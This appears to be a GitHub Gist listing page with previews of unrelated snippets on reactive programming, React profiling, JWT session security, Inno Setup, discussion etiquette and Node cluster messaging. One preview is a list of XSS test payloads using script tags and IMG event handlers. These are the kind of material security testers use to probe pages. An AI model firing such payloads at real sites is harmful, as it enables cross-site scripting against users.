(by @andrestaltz)
If you prefer to watch video tutorials with live-coding, then check out this series I recorded with the same contents as in this article: Egghead.io - Introduction to Reactive Programming.
staltz
/ introrx.md
Last active
May 7, 2024 09:38
The introduction to Reactive Programming you've been missing
ericelliott
/ essential-javascript-links.md
Last active
May 7, 2024 01:25
Essential JavaScript Links
React recently introduced an experimental profiler API. This page gives instructions on how to use this API in a production release of your app.
Table of Contents
React DOM automatically supports profiling in development mode for v16.5+, but since profiling adds some small additional overhead it is opt-in for production mode. This gist explains how to opt-in.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
TLDR: JWTs should not be used for keeping your user logged in. They are not designed for this purpose, they are not secure, and there is a much better tool which is designed for it: regular cookie sessions.
If you've got a bit of time to watch a presentation on it, I highly recommend this talk: https://www.youtube.com/watch?v=pYeekwv3vC4 (Note that other topics are largely skimmed over, such as CSRF protection. You should learn about other topics from other sources. Also note that "valid" usecases for JWTs at the end of the video can also be easily handled by other, better, and more secure tools. Specifically, PASETO.)
A related topic: Don't use localStorage (or sessionStorage) for authentication credentials, including JWT tokens: https://www.rdegges.com/2018/please-stop-using-local-storage/
The reason to avoid JWTs comes down to a couple different points:
- The JWT specification is specifically designed only for very short-live tokens (~5 minute or less). Sessions
Inno Setup is a popular installer builder for Windows. Of course it is made to run on Windows only, by default. But what if you want to build Windows installers off Windows, i.e. on Linux or macOS?
You’re in luck: It’s possible to run Inno Setup anywhere that Docker runs (including Linux and macOS), and even have a passable experience writing your setup script.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import { Component } from "React"; | |
| export var Enhance = ComposedComponent => class extends Component { | |
| constructor() { | |
| this.state = { data: null }; | |
| } | |
| componentDidMount() { | |
| this.setState({ data: 'Hello' }); | |
| } | |
| render() { |
evancz
/ Guidelines.md
Last active
October 17, 2023 05:36
Some thoughts on how to have nicer discussions online
I personally like to have discussions in the spirit of the Socratic method. Instead of declaring my opinion, I ask a relevant question. How about this situation? What about this case? This has two possible outcomes.
- The other person explains to me how things work in that case. I realize that I misunderstood, and we both come out enriched and in agreement.
- The other person realizes that those situations are not covered. They realize they misunderstood, and we both come out enriched and in agreement.
In both cases, it could have been a conflict, egos crashing together. But by asking questions, it becomes a collaboration to find the best answer. Even the simple act of asking a question in the first place says, "I care what you have to say, we can agree on this." That said, I have noticed that it is definitely still possible for things to go wrong within this framework. How can this happen?
There was a passage from [The
jpoehls
/ node-cluster-messaging.js
Created
March 29, 2012 01:48
Simple message passing between cluster master and workers in Node.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var cluster = require('cluster'); | |
| if (cluster.isWorker) { | |
| console.log('Worker ' + process.pid + ' has started.'); | |
| // Send message to master process. | |
| process.send({msgFromWorker: 'This is from worker ' + process.pid + '.'}) | |
| // Receive messages from the master process. |
NewerOlder